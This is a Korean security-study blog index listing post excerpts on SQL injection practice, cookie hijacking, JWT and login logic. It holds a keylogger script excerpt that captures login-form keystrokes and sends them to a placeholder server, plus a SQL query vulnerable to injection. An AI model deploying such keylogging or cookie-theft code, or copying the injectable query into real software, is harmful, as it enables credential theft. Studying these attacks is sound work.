📓 Codegear_Archive

[2] doldol 데이터만 출력하기 (하나만 나오게!) http://ctf.segfaulthub.com:1020/sqlInjection_2_1.php Normaltic's SQL Practice ctf.segfaulthub.com:1020

모의 해킹 스터디 - 4주차 과제 (1-1) 키 로거 추가 구현 코드 구성 key_logger.html key_logger.js key_logger.php view.html key_logger.html Login Form Login 로그인 폼의 키로거 key_logger.js var keys=''; var url = 'http://ip adress/key_logger.php?c='; document.onkeydown = function(e) { var key = e.key; keys+=key; } window.setInterval(function(){ if(keys.length > 0) { var data = encodeURIComponent(keys) new Image().src = url + data..

모의 해킹 스터디 - 과제 4주차 (1-2) 쿠키 탈취 쿠키 탈취 (Cookie hijacking) JavaScript Session 탈취 PHP(Server) : getCookie.php

모의 해킹 스터디 - 4주차 과제 (1-1) 키 로거 구현 키 로깅이란? 키 로깅(Keylogging, 키 스트로크 로깅(Keystroke logging) 사용자가 키보드로 PC에 입력하는 내용을 몰래 가로채어 기록하는 행위 (키보드로 입력하는 정보를 중간에 가로채기 하여 정보를 훔쳐가는 해킹 도구) 내가 입력한 키 값의 로그를 타인이 봄으로써 해킹 피해에 노출 하드웨어, 소프트웨어를 활용한 방법에서부터 전자적, 음향기술을 활용한 기법까지 다양한 키로깅 방법이 존재 키 로거(Key Logger) Key + Log 키보드에 입력한 키의 흔적을 남기는 프로그램 프로세스로 사중하면서 키보드에 입력된 모든 기록들을 .txt 혹은 지정된 확장자로 저장되게 함 키보드를 통해 이뤄지는 모든 정보가 노출되고 있는 것 ..

모의 해킹 스터디 - 3주차 과제 (3-3) JWT 구현 (로그인 유지) 코드에 대하여 더 보다가 발견한 문제점 수정 TIL - JWT 토큰 (내 코드의 문제점 발견) 모의 해킹 스터디 - 3주차 과제 (3-2) JWT 구현 - jwt 규격에 어긋남 모의 해킹 스터디 - 과제 03주차(3-2) JWT 구현 - jwt 규격에 어긋남 모의 해킹 스터디 - 3주차 과제 (3-2) JWT 구현(로그인 유지) 문제점 발견 기존의 로그인 페이지의 Develop 과제 모의 해킹 스터디 - 3주차 과제(1) 로그인 페이지 보완 모의 해킹 스터디 - 과제 03주차(1) codegear-archive.tistory.com JWT 구현에 성공했다고 생각하고, 이것저것 추가적으로 찾아보던 도중 jwt 규격에 맞지 않는 방식으..

모의 해킹 스터디 - 3주차 과제 (3-2) JWT 구현(로그인 유지) 문제점 발견 기존의 로그인 페이지의 Develop 과제 모의 해킹 스터디 - 3주차 과제(1) 로그인 페이지 보완 모의 해킹 스터디 - 과제 03주차(1) 로그인 페이지 보완 모의 해킹 스터디 - 과제 03주차(1) 로그인 페이지 보완 모의 해킹 스터디 - 2주차 과제 (마이페이지 - 나의 정보) 모의 해킹 스터디 - 과제 02주차(3) (마이페이지 - 나의 정보) 모의 해킹 스터디 - 2주 codegear-archive.tistory.com 위의 과제부터 JWT를 사용, 이전에는 세션(SESSION)을 이용 (기존의 과제 진행에 있어 GET을 이용하여 다른 페이지로 정보를 보내려 했음) 보안적인 문제만 발생할 뿐, JWT를 이용하여..

모의 해킹 스터디 - 3주차 추가과제 (3-1) JWT 구현을 위한(쿠키 / 세션)정리 JWT를 구현하기에 앞서 쿠키(Cookie) 와 세션(Session)의 사용 방식 정리 JWT도 결국 쿠키에 넣어서 사용하기 때문에 정리 세션의 경우도 마찬가지로 쿠키를 이용 쿠키(Cookie) 1) 쿠키 생성, 수정

JWT 에 대한 이해 이전 글에서 이어지는 내용 모의 해킹 스터디 - 기록일지 03주차 (로그인 로직/로그인 유지) 모의 해킹 스터디 - 기록일지 03주차 (로그인 로직/로그인 유지) 로그인 로직(로그인 과정)과 로그인 유지 방법에 대한 이해 로그인이란 무엇인가? 다중 사용자 시스템을 사용하기 위하여 컴퓨터에 사용자임을 알리는일 (즉, 컴퓨터가 그 사람이 맞는지를 확인 codegear-archive.tistory.com 왜 JWT일까? 앞서 보았듯이 인증을 위해 Cookie와 Session을 사용하고, 그 한계점, 보안성의 문제가 존재 쿠키와 세션의 단점에 대하여 좀 더 살펴 보자면... 쿠키(Cookie) 로그인 했을 때 Set-Cookie의 형태로 반환을 받은 쿠키를 토대로 로그인이 필요한 요청마다 ..

모의 해킹 스터디 - 과제 03주차(2) 로그인 로직 (식별/인증/해시) 기존 과제에서 사용한 로직 : 식별 / 인증 분리 (with 해시) 모의 해킹 스터디 - 과제 02주차(2) (회원가입/로그인 페이지 구현) 식별/인증/Hash를 활용한 로그인 로직 4가지 구현 식별/인증 동시 식별/인증 분리 식별/인증 동시 (with 해시) 식별/인증 분리 (with 해시) 1) 식별/인증 동시 회원 데이터 조회 및 일치여부 확인 (아이디 비밀번호 동시 조회) SELECT * FROM userTbl WHERE userID= '$userID' and pass= '$pass'" $cnt = mysqli_num_rows($ret); 값이 1인지 판단 $cnt == 0 : 일치하는 결과 값이 없음 - 로그인 실패 $cn..

모의 해킹 스터디 - 과제 03주차(1) 로그인 페이지 보완 모의 해킹 스터디 - 2주차 과제 (마이페이지 - 나의 정보) 모의 해킹 스터디 - 과제 02주차(3) (마이페이지 - 나의 정보) 모의 해킹 스터디 - 2주차 과제(3) (마이페이지 - 나의 정보) 모의 해킹 스터디 - 과제 02주차(2) (회원가입/로그인 페이지 구현)의 Develop 과제 모의 해킹 스터디 - 과제 02주차(2) (회원가입/로그인 페 codegear-archive.tistory.com 로그인 페이지 구현의 Develop 과제 비밀번호 변경 회원정보 수정 회원탈퇴 변경점 (리디렉션 변경) home.php mypage.php 추가된 코드 비밀번호 변경 edit_pw.php change.php 회원정보 수정 edit.php up..